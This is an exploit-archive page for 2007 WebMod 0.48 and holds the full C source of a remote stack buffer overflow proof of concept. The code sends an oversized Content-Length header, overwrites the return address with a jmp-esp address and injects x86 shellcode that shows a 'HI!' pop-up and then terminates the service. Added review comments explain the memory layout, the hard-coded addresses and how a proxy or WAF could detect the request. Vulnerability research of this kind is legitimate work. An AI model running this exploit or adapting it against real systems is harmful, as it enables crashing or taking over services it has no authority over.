
WebMod 0.48 (Content-Length) Remote Buffer Overflow Exploit PoC

02 Mar 2007 00:00:00 — Reported by RootType

Remote Buffer Overflow Exploit in WebMod 0.48 (Content-Length)

Code

/*
 * WebMod Stack Buffer Overflow
 *
 * by cybermind (Kevin Masterson)
 * [email protected]
 *
 * WebMod v0.48 exploit PoC code
 *
 */
#include&nbsp;<stdio.h>
#include&nbsp;<stdlib.h>
#include&nbsp;<string.h>

#define&nbsp;WIN32_LEAN_AND_MEAN
#include&nbsp;<windows.h>
#include&nbsp;<winsock.h>
#pragma&nbsp;comment&nbsp;(lib,&nbsp;\"ws2_32.lib\")

/*
local variables in connectHandle():

char *input;			4
char buf[8192+1];		8193
int i,j;			8
int connfd;			4
int myid;			4
threaddata_t *tdata;		4
httpquery_t query;		149036
char tmp[1025];			1025
int rcv;			4
char clbuf[11];			11

total:				158293
actual (due to padding):	158308


  breakdown of types:
	typedef struct s_var {		546
	  char name[33];		  33
	  char value[513];		  513
	} var_s;


	typedef struct s_httpquery {	149036
	  char method[11];		  11
	  char clientip[16];		  16
	  char url[257];		  257
	  char *get;			  4
	  char *post;			  4
	  char *cookies;		  4
	  var_s vars[256];		  139776
	  char currentmapname[257];	  257
	  char sendcookies[8192+1];	  8193
	  char contenttype[257];	  257
	  char location[257];		  257
	} httpquery_t;
*/

//contains data to fill the Content-Length field with
//
//NOTE(review): 20000-byte filler chunk. main() fills it with 'a' and writes
//it to the socket 7 times plus a partial 18308 bytes (158308 bytes in total)
//as the value of the Content-Length header. A header value of that size is
//the property a request-header length limit or a WAF/IDS rule catches long
//before the application parses it: a legitimate Content-Length value is a
//short decimal integer.
char spambuf[20000];

//code to inject
//this particular code only works on Win2K SP4 (v5.0.4.0)
//and kernel32.dll v5.0.2195.6688
//
//NOTE(review): x86 machine code; the trailing comments on each line are its
//disassembly. On the target it pushes the string "HI!" (built with a
//subtraction so that no 0x00 byte appears in the payload), shows it with
//MessageBox, then passes the GetCurrentProcessId() result to
//TerminateProcess -- a visible pop-up followed by termination of the
//service, not a shell. All three API addresses (0x77E38098, 0x7C4EB8F4,
//0x7C518DC3) are absolute and therefore valid only for the exact DLL builds
//named above; address-space randomisation on later Windows releases
//invalidates such hard-coded addresses by design.
unsigned char code[] = {
					// ; push string onto the stack without using 0x00
	0xB8, 0x59, 0x5A, 0x32, 0x11,	//mov     eax, 11325A59h ; "HI!" + 11111111h
	0x2D, 0x11, 0x11, 0x11, 0x11,	//sub     eax, 11111111h
	0x50,				//push    eax
	0x8B, 0xC4,			//mov     eax, esp	 ; eax points to string

	0x33, 0xC9,			//xor     ecx, ecx	 ; zero

					// ; call MessageBox
	0x51,				//push    ecx		 ; flags (0)
	0x50,				//push    eax		 ; caption
	0x50,				//push    eax		 ; text
	0x51,				//push    ecx		 ; hwnd (0)
	0xB8, 0x98, 0x80, 0xE3, 0x77,	//mov     eax, 77E38098h ; &MessageBox
	0xFF, 0xD0,			//call    eax

					// ; call GetCurrentProcessId
	0xB8, 0xF4, 0xB8, 0x4E, 0x7C,	//mov     eax, 7C4EB8F4h ; &GetCurrentProcessId
	0xFF, 0xD0,			//call    eax

	0x33, 0xC9,			//xor     ecx, ecx	 ; zero

					// ; call TerminateProcess
	0x51,				//push    ecx		 ; return code (0)
	0x50,				//push    eax		 ; process id
	0xB8, 0xC3, 0x8D, 0x51, 0x7C,   //mov     eax, 7C518DC3h ; &TerminateProcess
	0xFF, 0xD0			//call    eax

};

//EIP you want to insert, this points to an "FF E4" (jmp esp) in w_mm.dll
//set this to 0xFFFFFFFF to just cause a crash
//
//NOTE(review): the value that lands on the saved return address once the
//158308 filler bytes have been written. Like the addresses in code[] it is a
//fixed absolute address inside one specific module build, and main() sends
//it as raw memory, i.e. in the host's byte order.
unsigned int our_eip = 0x67E03C5B;

/*
 * Entry point of the PoC.
 *
 * argv[1]  hostname or IP of the WebMod instance.
 * argv[2]  optional port (default 27015); parsed with atoi(), so it is not
 *          validated and is truncated into a short.
 *
 * Opens a Winsock TCP connection, sends one HTTP POST whose Content-Length
 * header value is 158308 filler bytes (7 x 20000 + 18308, the padded frame
 * size from the layout comment above) followed by our_eip and the bytes of
 * code[], then the terminating newlines, and sleeps 15 s before exiting.
 *
 * Returns 0 after the data has been written, 1 on usage, socket(),
 * gethostbyname() or connect() failure.
 *
 * Review notes:
 *  - WSAStartup() and every send() return value are unchecked; a send()
 *    returning SOCKET_ERROR (-1) would simply be added to the unsigned
 *    byte counter.
 *  - The socket is never closed and WSACleanup() is never called; both are
 *    left to process exit.
 *  - Two of the string literals below appear split across physical lines;
 *    that is how this copy was extracted, and the original escape sequences
 *    (the line terminators) cannot be recovered from it.
 *  - On the receiving side the request is trivially anomalous: a
 *    Content-Length value that is not a short decimal integer can be
 *    rejected or alerted on at a proxy/WAF before it reaches the service.
 */
int main(int argc, char* argv[]) {
	WSADATA wsadata;
	int sock = 0;
	struct hostent* host = NULL;
	struct sockaddr_in saddr;

	//data to send initially
	//NOTE(review): literal shown split across lines by the extraction; the
	//original line-terminator escapes are not recoverable from this copy
	char initbuf[] = "POST / HTTP/1.1
Host: localhost:27015
Content-Length: ";

	//data to send after headers
	//NOTE(review): presumably the line terminators that end the header block
	//(same extraction caveat as initbuf)
	char endbuf[] = "

";

	char* hostname = NULL;
	short hostport = 27015;

	int i;
	unsigned int sent = 0;	//running byte count; send() error returns are not filtered out

	//get host/port from command line
	if (argc < 2) {
		printf("Usage:	%s <hostname|ip> [port=27015]
", argv[0]);
		return 1;
	}
	hostname = argv[1];
	if (argc >= 3) hostport = atoi(argv[2]);	//no format/range validation

	WSAStartup(MAKEWORD(1,1), &wsadata);	//return value unchecked

	sock = socket(AF_INET, SOCK_STREAM, 0);
	//socket() returns an unsigned SOCKET; this check relies on INVALID_SOCKET
	//reading as -1 once stored in an int
	if (sock <= 0) {
		printf("socket() error
");
		return 1;
	}

	host = gethostbyname(hostname);
	if (!host) {
		printf("gethostbyname() error
");
		return 1;
	}

	printf("Resolved \"%s\" to %s
", hostname, inet_ntoa(*(struct in_addr*)host->h_addr_list[0]));

	memset(&saddr, 0, sizeof(struct sockaddr_in));
	saddr.sin_family = AF_INET;
	saddr.sin_port = htons(hostport);
	//copies h_length bytes into the 4-byte s_addr; assumes an AF_INET answer
	//(h_length == 4), which is not checked here
	memcpy(&saddr.sin_addr.s_addr, host->h_addr_list[0], host->h_length);

	//sizeof(struct sockaddr) and sizeof(struct sockaddr_in) coincide for IPv4
	if (connect(sock, (struct sockaddr*)&saddr, sizeof(struct sockaddr)) < 0) {
		printf("connect() error
");
		return 1;
	}

	//initialize buffers
	memset(spambuf, 'a', sizeof(spambuf));

	//send initial POST request (request line, Host header, "Content-Length: ")
	sent += send(sock, initbuf, sizeof(initbuf)-1, 0);

	//send 7 full spambufs to get 140000 bytes
	for (i = 0; i < 7; ++i)
		sent += send(sock, spambuf, sizeof(spambuf), 0);

	//send partial spambuf to fill remaining data
	//(18308, this goes right up to the EIP)
	//140000 + 18308 = 158308, the padded frame size in the layout comment
	sent += send(sock, spambuf, 18308, 0);

	//fill EIP
	//our_eip goes out as raw memory, i.e. in host byte order
	sent += send(sock, (char*)&our_eip, sizeof(our_eip), 0);

	//insert code!
	sent += send(sock, (char*)code, sizeof(code), 0);

	//send newlines after content-length
	sent += send(sock, endbuf, sizeof(endbuf)-1, 0);

	printf("%u bytes sent...waiting...
", sent);

	//wait for a while so the socket isn't closed on our end
	//before they receive all the data
	//15 s; no closesocket()/WSACleanup() follows, the process exit releases them
	Sleep(15000);

	return 0;
}


